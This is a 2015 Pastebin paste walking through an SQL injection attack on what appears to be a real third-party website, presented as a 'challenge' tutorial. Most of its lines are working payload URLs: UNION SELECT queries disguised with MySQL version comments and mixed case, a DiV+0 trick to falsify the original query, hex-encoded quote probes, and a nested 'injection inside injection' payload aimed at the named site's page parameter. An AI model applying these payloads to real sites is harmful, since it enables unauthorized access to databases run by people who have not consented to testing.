API tools faq
paste
Advertisement
Kyfx

Another SQL injection explation :) v4

Kyfx
Mar 20th, 2015
438
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.02 KB | None | 0 0
raw download clone embed print report
  1. explaination of my Chalnge
  2. Friends Let's See
  3. 1-injection point is :
  4.  
  5. http://www.onlinepost.in/show.php?page=39
  6. -------------------------------------------------------
  7.  
  8. 2-so, try to inject
  9.  
  10. http://www.onlinepost.in/show.php?page= 39 /*!50000UnIoN*/ aLL SeLeCt+1,2,3,4--
  11.  
  12. but the page remains same and no output comes so DiV+0 use to false the query
  13. -----------------------------------------------------------------------
  14. http://www.onlinepost.in/show.php?page= 39 +DiV+0+/*!50000UnIoN*/ aLL SeLeCt+1,2,3,4--
  15.  
  16. but the also remains same no output comes
  17. ------------------------------------------------------------------------------------
  18. this code:
  19.  
  20. http://www.onlinepost.in/show.php?page=39+DiV+0+/*!50000UnIoN*/ aLL SeLeCt+1,2,3,4-- -
  21.  
  22. doesn't show vulnerable column,
  23. so first you try with union select 1111,2222,3333,4444-- - and search for those number in source code. If you can't find them that is why I check for another injection in one of possible four columns. you try with second injection with adding ' after each column with hex like
  24.  
  25. /*!50000UnIoN*/ aLL SeLeCt+0x3127,2,3,4-- -
  26.  
  27. You will find out 2' or 3' or 4' (in hex) doesn't give error, but 1' in hex 0x3127 gives you error. So there is possible second injection
  28.  
  29. ---------------------------------------------------------------------------------------------------------
  30. then you try to find column numbers for second injection. As you see in my code there are 11 column for second injection. Complete second injection is done inside of column 1. So we have double injection - BUT this is not same as error based double injection. This is injection inside injection
  31. like
  32. http://www.onlinepost.in/show.php?page= 39 +DiV+0+/*!50000UnIoN*/ aLL SeLeCt+"1'+DiV+0+/*!50000UnIoN*/+aLL+SeLeCt+1,2,3,4,5,6,7,8,9,10,11-- -",2,3,4--
  33. and double quotes are use because magic_quotes are off so we don't need hex
  34. ---------------------------------------------------------------------------------------------
  35. so we successfully injected if any problem in my tut so plz tell me
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!